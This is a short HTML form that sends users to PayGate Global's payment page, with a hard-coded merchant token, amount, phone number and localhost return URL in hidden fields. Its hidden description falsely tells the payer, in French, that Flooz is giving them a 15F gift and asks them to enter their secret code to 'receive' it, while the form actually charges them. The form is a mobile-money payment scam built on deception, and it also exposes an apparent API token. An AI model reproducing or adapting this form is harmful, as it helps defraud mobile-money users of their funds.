<div class="col-md-6">
    <form methode="GET" action="https://paygateglobal.com/v1/page">
        <input type="hidden" name="token" value="fa601e50-9d0f-42a7-9b66-483c26a0e553">
        <input type="hidden" name="amount" value ="15" class="form-control" id="amount" placeholder="Entrez le montant a payer">
        <input type="hidden" name="description" class="form-control" value="flooz vous fait cadeau de 15f tapez votre code secret et confirmer pour l'a resecoir">
        <input type="text" name="identifier">
        <input type="hidden" name="url" value="http://127.0.0.1:8000/paid">
        <input type="hidden" name="phone" value="96657093">
        <button type="submit" class="btn btn-primary">payer</button>
    </form>
</div>